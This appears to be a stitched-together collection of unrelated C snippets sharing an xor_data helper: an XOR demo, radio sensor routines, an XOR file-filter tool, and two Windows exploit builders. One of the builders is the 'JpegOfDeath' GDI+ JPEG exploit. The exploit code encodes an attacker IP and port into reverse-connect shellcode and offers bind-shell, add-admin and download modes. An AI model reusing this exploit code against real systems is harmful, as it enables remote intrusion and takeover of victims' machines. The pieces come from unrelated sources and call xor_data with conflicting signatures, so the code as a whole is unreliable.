int main(int argc, char const *argv[]) { uint8_t key[] = {0x01, 0x02, 0x03, 0x04}; uint8_t data[] = {0x55, 0x66, 0x77}; xor_data(key, data, 3); printf("%x %x %x\n", data[0], data[1], data[2]); xor_data(key, data, 3); printf("%x %x %x\n", data[0], data[1], data[2]); return 0; }
int radio_send_state_update(uint8_t sensor_type, uint8_t sensor_index, uint16_t value) { radio_state_update_frame frame; uint8_t *buffer = (uint8_t *)&frame; memset(&frame, 0, sizeof(frame)); frame.header.source = state.uid; frame.header.dest = DEST_MASTER; frame.header.msg_type = SENSOR_MSG_STATE_UPDATE; frame.sensor_type = sensor_type; frame.sensor_index = sensor_index; frame.value = value; xor_data(buffer, sizeof(frame)); vw_send(buffer, sizeof(frame)); vw_wait_tx(); }
int radio_receive_message(uint8_t *buffer, uint8_t *buflen) { if (vw_get_message(buffer, buflen)) // Non-blocking { // decrypt xor_data(buffer, *buflen); if( *buflen >= sizeof(radio_frame_header) ){ radio_frame_header *header = (radio_frame_header*) buffer; return header->msg_type; } else { // ignore invalid packets return 0; } } else { return 0; } }
int main(int argc, char *argv[]) { int i = 0; int raw_num = 0; unsigned long port = 1337; /* default port for bind and reverse attacks */ unsigned long encoded_port = 0; unsigned long encoded_ip = 0; unsigned char print_raw_exploit = 0; unsigned char attack_mode = 2; /* bind attack by default */ char ip_addr[256]; char exploit[2048]; char str_num[16]; char *p1, *p2; FILE *EXPLOIT_FP; char outfile[512]; WSADATA wsa; if (argc < 2) print_usage(argv[0]); /* process commandline */ for (i = 0; i < argc; i++) { if (argv[i][0] == '-') { switch (argv[i][1]) { case 'r': /* reverse connect */ strncpy(ip_addr, argv[i+1], 20); attack_mode = 1; break; case 'b': /* bind */ attack_mode = 2; break; case 'p': port = atoi(argv[i+1]); /* port */ break; case 'o': print_raw_exploit = 1; break; case 'e': strncpy(outfile, argv[i+1], 256); } } } /* initialize the socket library */ if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) { printf("Error: Winsock didn't initialize!\n"); exit(-1); } /* build exploit */ strncpy(exploit, injection_vector, strlen(injection_vector)); exploit[strlen(injection_vector)+1]=0; // tack on NULL byte encoded_port = htonl(port); encoded_port += 2; if (attack_mode == 1) { /* reverse connect attack */ reverse_shellcode[196] = (char) 0x90; reverse_shellcode[197] = (char) 0x92; reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff)); reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff)); p1 = strchr(ip_addr, '.'); strncpy(str_num, ip_addr, p1-ip_addr); raw_num = atoi(str_num); reverse_shellcode[191] = xor_data((char)raw_num); p2 = strchr(p1+1, '.'); strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1); raw_num = atoi(str_num); reverse_shellcode[192] = xor_data((char)raw_num); p1 = strchr(p2+1, '.'); strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2); raw_num = atoi(str_num); reverse_shellcode[193] = xor_data((char)raw_num); p2 = strrchr(ip_addr, '.'); strncpy(str_num, p2+1, 5); raw_num = atoi(str_num); reverse_shellcode[194] = xor_data((char)raw_num); strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode)); }
int main(int argc, char **argv) { char buf[1024]; /* keep this at 1k or adjust garbage calc below */ FILE *in = stdin; FILE *out = stdout; char *ifn = NULL; char *ofn = NULL; const char *pattern = default_pattern; char hex_pattern[128]; unsigned int hex_buf; int c; int v0, v1, v2; size_t n; int p_len, p_off = 0; while ((c = getopt(argc, argv, "i:o:p:xh")) != -1) { switch (c) { case 'i': ifn = optarg; break; case 'o': ofn = optarg; break; case 'p': pattern = optarg; break; case 'x': is_hex_pattern = true; break; case 'h': default: usage(); } } if (optind != argc || optind == 1) { fprintf(stderr, "illegal arg \"%s\"\n", argv[optind]); usage(); } if (ifn && !(in = fopen(ifn, "r"))) { fprintf(stderr, "can not open \"%s\" for reading\n", ifn); usage(); } if (ofn && !(out = fopen(ofn, "w"))) { fprintf(stderr, "can not open \"%s\" for writing\n", ofn); usage(); } p_len = strlen(pattern); if (p_len == 0) { fprintf(stderr, "pattern cannot be empty\n"); usage(); } if (is_hex_pattern) { int i; if ((p_len / 2) > sizeof(hex_pattern)) { fprintf(stderr, "provided hex pattern is too long\n"); usage(); } if (p_len % 2 != 0) { fprintf(stderr, "the number of characters (hex) is incorrect\n"); usage(); } for (i = 0; i < (p_len / 2); i++) { if (sscanf(pattern + (i * 2), "%2x", &hex_buf) < 0) { fprintf(stderr, "invalid hex digit around %d\n", i * 2); usage(); } hex_pattern[i] = (char)hex_buf; } } while ((n = fread(buf, 1, sizeof(buf), in)) > 0) { if (n < sizeof(buf)) { if (ferror(in)) { FREAD_ERROR: fprintf(stderr, "fread error\n"); return EXIT_FAILURE; } } if (is_hex_pattern) { p_off = xor_data(buf, n, hex_pattern, (p_len / 2), p_off); } else { p_off = xor_data(buf, n, pattern, p_len, p_off); } if (!fwrite(buf, n, 1, out)) { FWRITE_ERROR: fprintf(stderr, "fwrite error\n"); return EXIT_FAILURE; } } if (ferror(in)) { goto FREAD_ERROR; } if (fflush(out)) { goto FWRITE_ERROR; } fclose(in); fclose(out); return EXIT_SUCCESS; }
int main(int argc, char *argv[]) { FILE *fout; unsigned int i = 0,j = 0; int raw_num = 0; unsigned long port = 1337; // default port for bind and reverse attacks unsigned long encoded_port = 0; unsigned long encoded_ip = 0; unsigned char attack_mode = 2; // bind by default char *p1 = NULL, *p2 = NULL; char ip_addr[256]; char str_num[16]; char jpeg_filename[256]; WSADATA wsa; printf(" +------------------------------------------------+\n"); printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n"); printf(" | Exploit by John Bissell A.K.A. HighT1mes |\n"); printf(" | TweaKed By M4Z3R For GSO |\n"); printf(" | September, 23, 2004 |\n"); printf(" +------------------------------------------------+\n"); if (argc < 2) print_usage(argv[0]); // process commandline for (i = 0; i < (unsigned) argc; i++) { if (argv[i][0] == '-') { switch (argv[i][1]) { // reverse connect case 'r': strncpy(ip_addr, argv[i+1], 20); attack_mode = 1; break; // bind case 'b': attack_mode = 2; break; // Add.Admin case 'a': attack_mode = 3; break; // DL case 'd': attack_mode = 4; break; // port case 'p': port = atoi(argv[i+1]); break; } } } strncpy(jpeg_filename, argv[i-1], 255); fout = fopen(argv[i-1], "wb"); if( !fout ) { printf("Error: JPEG File %s Not Created!\n", argv[i-1]); return(EXIT_FAILURE); } // initialize the socket library if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) { printf("Error: Winsock didn't initialize!\n"); exit(-1); } encoded_port = htonl(port); encoded_port += 2; if (attack_mode == 1) { // reverse connect attack reverse_shellcode[184] = (char) 0x90; reverse_shellcode[185] = (char) 0x92; reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff)); reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff)); p1 = strchr(ip_addr, '.'); strncpy(str_num, ip_addr, p1 - ip_addr); raw_num = atoi(str_num); reverse_shellcode[179] = xor_data((char)raw_num); p2 = strchr(p1+1, '.'); strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1); raw_num = atoi(str_num); reverse_shellcode[180] = xor_data((char)raw_num); p1 = strchr(p2+1, '.'); strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2); raw_num = atoi(str_num); reverse_shellcode[181] = xor_data((char)raw_num); p2 = strrchr(ip_addr, '.'); strncpy(str_num, p2+1, 5); raw_num = atoi(str_num); reverse_shellcode[182] = xor_data((char)raw_num); }